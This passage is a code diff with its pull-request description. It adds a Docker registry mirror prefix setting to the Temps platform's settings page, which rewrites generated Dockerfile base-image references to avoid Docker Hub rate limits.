+     * Whether the initial deployment was successfully queued. This is set for
+     * native image service templates; Git-backed modes use their pipeline flow.
      */
     deployment_queued?: boolean | null;
     /**
@@ -4545,7 +4550,8 @@ export type CreateProjectRequest = {
      */
     environment_variables?: Array<ProjectEnvVarInput> | null;
     /**
-     * Exact slug returned by service-template preflight. Normal project creation omits it.
+     * Optimistically reserved slug used by template creation to ensure the
+     * persisted project receives the URL shown during configuration.
      */
     expected_slug?: string | null;
     /**

--- a/web/src/api/platformSettings.ts
+++ b/web/src/api/platformSettings.ts
@@ -251,6 +251,9 @@ export function buildPlatformSettingsUpdateBody(
     // this field makes serde restore DockerRegistrySettings::default(), so a
     // successful save immediately clears the registry configuration.
     docker_registry: updated.docker_registry,
+    // Same reasoning: omitting this would silently clear the configured
+    // registry-mirror prefix on every unrelated settings save.
+    registry_mirror_prefix: updated.registry_mirror_prefix,
     disk_space_alert: updated.disk_space_alert,
     // The response replaces encrypted provider credentials with masked status
     // fields. The server restores those omitted secrets from storage on PUT.

--- a/web/src/components/settings/DockerRegistrySettings.tsx
+++ b/web/src/components/settings/DockerRegistrySettings.tsx
@@ -28,6 +28,11 @@ export interface DockerRegistrySettings {
 
 interface DockerRegistryFormValues {
   docker_registry: DockerRegistrySettings
+  // Present only so this type matches `DockerRegistryPage`'s form values
+  // exactly -- react-hook-form's `Control`/`UseFormRegister` generics require
+  // an exact match, and the page also has a `RegistryMirrorSettings` section.
+  // Unused by this component.
+  registry_mirror_prefix: string | null
 }
 
 interface DockerRegistrySettingsProps {

--- a/web/src/components/settings/RegistryMirrorSettings.tsx
+++ b/web/src/components/settings/RegistryMirrorSettings.tsx
@@ -1,0 +1,101 @@
+// SPDX-FileCopyrightText: 2024-2026 Temps Contributors
+// SPDX-License-Identifier: MIT OR Apache-2.0
+
+import {
+  Card,
+  CardContent,
+  CardDescription,
+  CardHeader,
+  CardTitle,
+} from '@/components/ui/card'
+import { Input } from '@/components/ui/input'
+import { Label } from '@/components/ui/label'
+import { Alert, AlertDescription } from '@/components/ui/alert'
+import { Container, Info } from 'lucide-react'
+import { UseFormRegisterReturn } from 'react-hook-form'
+
+interface RegistryMirrorSettingsProps {
+  /**
+   * The result of the host form's `register('registry_mirror_prefix')` call,
+   * not the `register` function itself -- keeps this component decoupled
+   * from the host page's full form-values type, which react-hook-form's
+   * `Control`/`UseFormRegister` generics otherwise require to match exactly.
+   */
+  prefixField: UseFormRegisterReturn<'registry_mirror_prefix'>
+  /** Current watched value, for the live example below the input. */
+  currentPrefix: string | null | undefined
+}
+
+/**
+ * Distinct from `DockerRegistrySettings` above: that one authenticates pulls
+ * to one *named* private registry a user's own image reference already
+ * points at. This rewrites Temps' own generated, otherwise-anonymous
+ * `docker.io` references (autopack's `FROM node:22-slim`) for operators whose
+ * internal registry is a path-prefixing reverse proxy rather than a
+ * `registry-mirrors`-compatible pull-through cache.
+ */
+export function RegistryMirrorSettings({
+  prefixField,
+  currentPrefix,
+}: RegistryMirrorSettingsProps) {
+  const example = currentPrefix?.trim()
+    ? currentPrefix.trim()
+    : 'registry.example.com/docker'
+
+  return (
+    <Card>
+      <CardHeader>
+        <CardTitle className="flex items-center gap-2">
+          <Container className="h-5 w-5" />
+          Registry Mirror / Prefix
+        </CardTitle>
+        <CardDescription>
+          Route base images Temps builds against (autopack&apos;s{' '}
+          <code>FROM node:22-slim</code> and similar) through an internal
+          registry that rewrites Docker Hub references, instead of pulling
+          anonymously from docker.io.
+        </CardDescription>
+      </CardHeader>
+      <CardContent className="space-y-4">
+        <div className="space-y-2">
+          <Label htmlFor="registry-mirror-prefix">Prefix</Label>
+          <Input
+            id="registry-mirror-prefix"
+            type="text"
+            placeholder="registry.example.com/docker"
+            autoComplete="off"
+            {...prefixField}
+          />
+          <p className="text-sm text-muted-foreground">
+            <code>node:22-slim</code> becomes{' '}
+            <code>{example}/node:22-slim</code>. Leave empty to pull anonymously
+            from docker.io (the default).
+          </p>
+        </div>
+
+        <Alert>
+          <Info className="h-4 w-4" />
+          <AlertDescription>
+            Most operators do not need this: if your internal registry can act
+            as a Docker <strong>pull-through cache</strong> (mirror protocol),
+            configure it directly on the Docker daemon instead (
+            <code>registry-mirrors</code> in{' '}
+            <code>/etc/docker/daemon.json</code>) — no Temps setting required,
+            and it also covers images Temps does not generate. Use the prefix
+            above only when your registry is a path-prefixing reverse proxy that
+            cannot do that. See{' '}
+            <a
+              href="https://temps.sh/docs/configure-a-docker-registry-mirror"
+              target="_blank"
+              rel="noopener noreferrer"
+              className="underline"
+            >
+              Configure a Docker Registry Mirror
+            </a>{' '}
+            for both options.
+          </AlertDescription>
+        </Alert>
+      </CardContent>
+    </Card>
+  )
+}

--- a/web/src/pages/settings/DockerRegistryPage.tsx
+++ b/web/src/pages/settings/DockerRegistryPage.tsx
@@ -4,6 +4,7 @@
 import { Alert, AlertDescription, AlertTitle } from '@/components/ui/alert'
 import { Button } from '@/components/ui/button'
 import { DockerRegistrySettings } from '@/components/settings/DockerRegistrySettings'
+import { RegistryMirrorSettings } from '@/components/settings/RegistryMirrorSettings'
 import { useBreadcrumbs } from '@/contexts/BreadcrumbContext'
 import { usePageTitle } from '@/hooks/usePageTitle'
 import { useSettings, useUpdateSettings } from '@/hooks/useSettings'
@@ -21,6 +22,7 @@ interface DockerRegistryFormData {
     tls_verify: boolean
     ca_certificate: string | null
   }
+  registry_mirror_prefix: string | null
 }
 
 export function DockerRegistryPage() {
@@ -45,10 +47,15 @@ export function DockerRegistryPage() {
         tls_verify: true,
         ca_certificate: null,
       },
+      registry_mirror_prefix: null,
     },
   })
 
   const dockerRegistry = useWatch({ control, name: 'docker_registry' })
+  const registryMirrorPrefix = useWatch({
+    control,
+    name: 'registry_mirror_prefix',
+  })
 
   useEffect(() => {
     setBreadcrumbs([
@@ -70,6 +77,7 @@ export function DockerRegistryPage() {
           tls_verify: true,
           ca_certificate: null,
         },
+        registry_mirror_prefix: settings.registry_mirror_prefix ?? null,
       })
     }
   }, [settings, reset])
@@ -109,6 +117,10 @@ export function DockerRegistryPage() {
         register={register}
         setValue={setValue}
         dockerRegistry={dockerRegistry}
+      />
+      <RegistryMirrorSettings
+        prefixField={register('registry_mirror_prefix')}
+        currentPrefix={registryMirrorPrefix}
       />
       {isDirty && (
         <div className="sticky bottom-0 bg-background border-t pt-4 pb-2">


### PR DESCRIPTION
## Summary

Autopack's generated Dockerfiles (and every other image pull Temps issues) resolve unqualified base images like `node:22-slim` against docker.io with no credentials. Docker Hub throttles anonymous pulls by source IP, which is worse for multi-node/multi-cluster operators sharing one WAN IP. Today this surfaces as an opaque pull failure in build logs, indistinguishable from a broken Dockerfile.

- **Diagnose it**: recognize the Docker Hub rate-limit signature (`toomanyrequests`, BuildKit's `429 Too Many Requests` authorize failure) in build failures and explain the fix instead of surfacing the raw pull error.
- **Docs**: `docs/howto/configure-a-docker-registry-mirror` walks through the zero-code-change fix most operators want — `registry-mirrors` in `/etc/docker/daemon.json` — including how to layer an authenticated pull-through cache for a higher pull ceiling.
- **Registry mirror prefix setting**: for operators whose internal registry is a path-prefixing reverse proxy rather than a `registry-mirrors`-compatible cache (so the daemon-level fix doesn't apply), an opt-in `registry_mirror_prefix` platform setting rewrites implicit Docker Hub `FROM` lines in generated Dockerfiles through the configured prefix.
  - Shared detection/rewrite logic lives in `temps-core::registry_prefix` (`is_docker_hub_image`, `qualify_with_registry_prefix`), reused by the Dockerfile-line rewriter in `temps-presets::registry_prefix` (which tracks multi-stage `AS <name>` stage references so they're never mistaken for a real image, and skips `FROM ${ARG}` build-arg references).
  - Applied centrally in `BuildImageJob::ensure_dockerfile`, so it covers every preset's generated Dockerfile, not just autopack's.
  - An existing Dockerfile already committed in a repo is never touched — the rewrite only runs on preset-generated content.
  - Settings UI: new "Registry Mirror / Prefix" card on the Docker Registry settings page, clearly distinguished from the existing (unrelated) private-registry-credentials section, with an inline explanation of when to use each.
  - A malformed prefix (embedded control characters, shell metacharacters — anything outside a registry host+path's character set) is rejected with 400 at the settings API, and independently never spliced into a Dockerfile even if it somehow reached build time — see the security fix noted below.

## Test plan

- [x] `cargo test --lib -p temps-core -p temps-presets -p temps-deployments -p temps-config` — 750+ passed
- [x] `cargo clippy --workspace --all-targets -- -D warnings` — clean
- [x] `bunx tsc --noEmit` (web/, apps/temps-cli) — clean
- [x] `bunx eslint` on touched frontend files — clean (one pre-existing unrelated lint error left untouched)
- [x] `bun test src/api/platformSettings.test.ts` — passing
- [x] Regenerated `apps/temps-cli/openapi.json` and `web/src/api/client/` against a live server — `bun run spec:check` confirms canonical shape
- [x] `crates/temps-presets/tests/registry_prefix_docker_build.rs`: two real `docker build` integration tests proving the rewritten `FROM` line survives BuildKit parsing and resolves — one against a public mirror (`mirror.gcr.io`), one against a local self-hosted registry via testcontainers (closer to the actual reverse-proxy scenario this feature targets)
- [ ] Manual verification: configure a prefix, deploy an autopack app, confirm the built image's `FROM` lines are rewritten and the build still succeeds
